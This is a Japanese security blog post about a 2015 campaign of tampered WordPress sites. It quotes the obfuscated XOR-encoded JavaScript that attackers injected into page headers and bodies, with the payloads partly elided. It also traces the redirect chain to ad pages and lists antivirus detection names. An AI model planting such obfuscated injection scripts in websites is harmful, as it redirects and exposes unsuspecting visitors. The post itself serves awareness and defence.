WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
 
ブログ作成ツール WordPress を使用してるサイトの改ざん被害のお話が報告されてます。
 
Wordpress header.php var a="'1Aqapkrv'02v{rg injection
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
 
The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
 
Zscaler Research: Compromised WordPress Campaign - Spyware Edition
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
 
何かしら WordPress がらみの脆弱性を悪用し、悪意のある第三者が 不正なJavaScriptコード<BODY>タグの直後に挿入するよう仕込んでるみたい。
<body>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2; 【~中略~】 )'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<追記始め>
 
同じ攻撃者による、別の不正なJavaScriptコードの紹介です。 
<body>
<script type="text/javascript">var a = "'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0: 【~中略~】 @'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<head>タグ終端の直前に挿入されるタイプです。
    <!-- ###: -->
    <script>var a = "'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{ 【~中略~】 {rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
    <!-- :### -->
</head>
<追記終わり>
 
JavaScriptコードが処理されると、欧州ラトビアのサーバーにある不審なURLアドレスを裏で読み込みにいきます。
 
https://www.virustotal.com/ja/ip-address/91.226.33.54/information/
 
改ざんされてるブログを閲覧しても変化はない一方で、Google検索経由でブログにアクセスすると広告ページ(2015 年年次訪問者調査)ヘ強制的に飛ばされました。
 
イメージ 5
 
Google検索
 ↓
(改ざんされてるブログ)
 ↓
http //kfc.i.illuminationes[.]com/snitch?default_keyword= ~
http //c11n4.i.teaserguide[.]com/snitch?default_keyword= ~
 ↓
http //c11n4.i.teaserguide[.]com/in/?_BC= ~
 ↓
怪しげな広告ページへ
 
この改ざん被害は、日本語表記の一般サイトでも目にする機会があって、けっこう複数殺られてる感じ?
 
イメージ 1
 
イメージ 2
 
複数の不正なJavaScriptコードが挿入されてるパターンも。
 
イメージ 3
 
イメージ 4
 
改ざんされてるブログをたまたま踏んだ場合にセキュリティソフトが警告するウイルス検出名はこんな感じ。
 
AVG HTML/Framer
BitDefender Trojan.Script.CPY
Kaspersky Trojan-Downloader.JS.Iframe.diq
McAfee JS/Agent.a
Microsoft Trojan:JS/Iframeinject.AE
Sophos Troj/Iframe-NM
関連するブログ記事
リダイレクト改ざんvar a setTimeout(10) default_keyword encodeURIComponent JavaScriptコード ( WEBサイト・CGI )